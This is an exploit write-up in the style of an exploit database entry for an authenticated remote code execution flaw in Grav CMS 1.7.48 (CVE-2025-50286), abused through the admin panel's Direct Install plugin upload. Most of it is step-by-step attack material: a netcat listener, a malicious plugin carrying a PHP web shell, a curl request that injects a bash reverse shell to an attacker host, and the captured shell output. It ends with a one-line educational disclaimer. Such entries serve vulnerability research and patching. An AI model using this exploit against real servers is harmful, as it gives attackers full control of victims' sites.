# Exploit Title: Grav CMS 1.7.48 - Remote Code Execution (RCE)
# Date: 2025-08-07
# Exploit Author: binneko (https://github.com/binneko)
# Vendor Homepage: https://getgrav.org/
# Software Link: https://github.com/getgrav/grav/releases/tag/1.7.48
# Version: Grav CMS v1.7.48 / Admin Plugin v1.10.48
# Tested on: Debian 11, Apache2, PHP 7.4
# CVE: CVE-2025-50286
# Description:
Grav CMS v1.7.48 with Admin Plugin v1.10.48 is vulnerable to Authenticated Remote Code Execution (RCE)
through the "Direct Install" feature in the admin panel. An authenticated administrator can upload
a plugin archive containing arbitrary PHP code; the server unpacks it into the plugin directory and
executes the PHP when the file is requested over HTTP.
# Steps to Reproduce:
1. Start a listener on your attack machine:
nc -lvnp 4444
2. Log in to the Grav Admin Panel as an administrator:
https://<target>/admin
3. Navigate to:
Tools → Direct Install
4. Upload a ZIP archive containing the following structure:
evilplugin/
├── evilplugin.php # Contains: <?php shell_exec($_GET['cmd']); ?>
└── blueprints.yaml # Minimal content to pass plugin validation
5. Request the installed plugin's PHP file and pass the command in the `cmd` parameter (replace
<attacker-ip> with the host running the listener from step 1):
curl --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/<attacker-ip>/4444 0>&1'" http://<target>/<path to the installed evilplugin.php>
6. Observe the reverse shell:
$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on <target-ip>
www-data@target:/var/www/html$ whoami
www-data
# Notes:
- Authentication is required (admin-level).
- The vulnerability exists due to insufficient validation in the plugin upload feature (`/admin/tools/direct-install`).
- Successful exploitation may result in full system compromise.
# References:
- https://github.com/getgrav/grav
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50286
# Disclaimer:
This exploit is provided for educational and research purposes only.